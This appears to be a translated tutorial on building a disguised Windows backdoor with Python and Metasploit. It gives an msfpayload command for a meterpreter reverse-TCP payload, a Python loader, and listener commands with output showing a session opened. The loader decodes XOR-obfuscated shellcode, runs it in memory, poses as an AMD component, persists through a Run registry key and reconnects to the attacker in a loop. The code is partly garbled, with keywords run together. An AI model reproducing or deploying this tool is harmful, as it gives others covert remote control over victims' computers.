Analysis of a remote-control tool, thanks to the guidance of Wstone.
Creating the DLL
./msfpayload windows/meterpreter/reverse_tcp lhost=192.168.1.123 lport=4444 >/tmp/sc.dll
Python
main.py
Importsys, OSImportShutilImport timeImportcTYPESImportGlobImportMultiprocessingImportmultiprocessing.forking fromScImportSC fromWin32fileImportGetlongpathnameImport_winreg fromItertoolsImportizip, Cycle fromUtilsImportgetppid, kill, get_base_dirreconnect_sleep= 60Startup_sleep= 30Child_startup_sleep= 10Meter_name="Aticlex.exe"Meter_dir="AMD"User_dir= Os.path.expanduser ("~")Try: fromWin32com.shellImportshellcon, Shell Appdata_dir=Shell. SHGetFolderPath (0, Shellcon. csidl_appdata, 0, 0) Data_dir=os.path.join (appdata_dir, Meter_dir)except: Data_dir=os.path.join (user_dir, Meter_dir) meter_path=os.path.join (data_dir, Meter_name)class_popen (multiprocessing.forking.Popen):def __init__(self, *args, * *kw):ifHasattr (sys,'Frozen'): os.putenv ('_meipass2', Sys._meipass)Try: Super (_popen, self).__init__(*args, * *Kw)finally: ifHasattr (sys,'Frozen'): os.unsetenv ('_meipass2')classProcess (multiprocessing. Process): _popen=_popenclassWorker (Process):defXOR (self, data, key='\x41\x82\x99\x73\x12\xf8\x0e\x38'): return "'. Join (CHR (ord (c) ^ord (k)) forC,kinchizip (data, Cycle (key)))defrun (self): time.sleep (child_startup_sleep) code=self.xor (sc) cbuf=Ctypes.create_string_buffer (code) func=ctypes.cast (cbuf, Ctypes. Cfunctype (ctypes. HRESULT) func ()defInstall (): reg=_winreg. Connectregistry (None, _winreg. Hkey_current_user) Key= _winreg. Openkey (reg,"Software\\microsoft\\windows\\currentversion\\run", 0, _winreg. Key_all_access) _winreg. SetValueEx (key, Meter_name.split (".") [0], 0, _winreg. reg_sz, Meter_path) PATH=getlongpathname (sys.executable)ifpath! 
=Meter_path:if notos.path.exists (data_dir): os.makedirs (data_dir)Try: shutil.copy (path, Meter_path)exceptException as E:sys.exit (1) os.execve (meter_path, [meter_path], Os.environ)defclean ():Try: Base_dir=get_base_dir () Temp_dir=os.path.abspath (os.path.join (base_dir, os.pardir)) Mei= Base_dir.split ("\\") [-1] Pattern="%s\\_mei*"%Temp_dir forPathinchGlob.glob (pattern): Path=getlongpathname (path)ifpath! = Base_dir andMei.lower () not inchPath.lower ():Try: Shutil.rmtree (path)except: Pass except: Passdefmain (): kill (getppid ()) time.sleep (startup_sleep) install () clean () whiletrue:p=Worker () P.daemon=True p.start () p.join () time.sleep (reconnect_sleep)if __name__=="__main__": Multiprocessing.freeze_support () main ()
sc.py
sc= ' \x12\x34 ' ... # sc = Sc.dll Open with RB mode
Then PyInstaller generates an EXE.
Listening for the connection:
msf > use exploit/multi/handler
msf exploit(handler) > set payload windows/meterpreter/reverse_tcp
payload = windows/meterpreter/reverse_tcp
msf exploit(handler) > set lhost 192.168.1.123
lhost = 192.168.1.123
msf exploit(handler) > set lport 4444
lport = 4444
msf exploit(handler) > run
[*] Started reverse handler on 192.168.1.123:4444
[*] Starting the payload handler...
[*] Sending stage (770048 bytes) to 192.168.1.80
[*] Meterpreter session 1 opened (192.168.1.123:4444 -> 192.168.1.80:1138) at 2014-10-22 19:03:43 -0500
meterpreter >
Python + MSF: building a Windows remote-control tool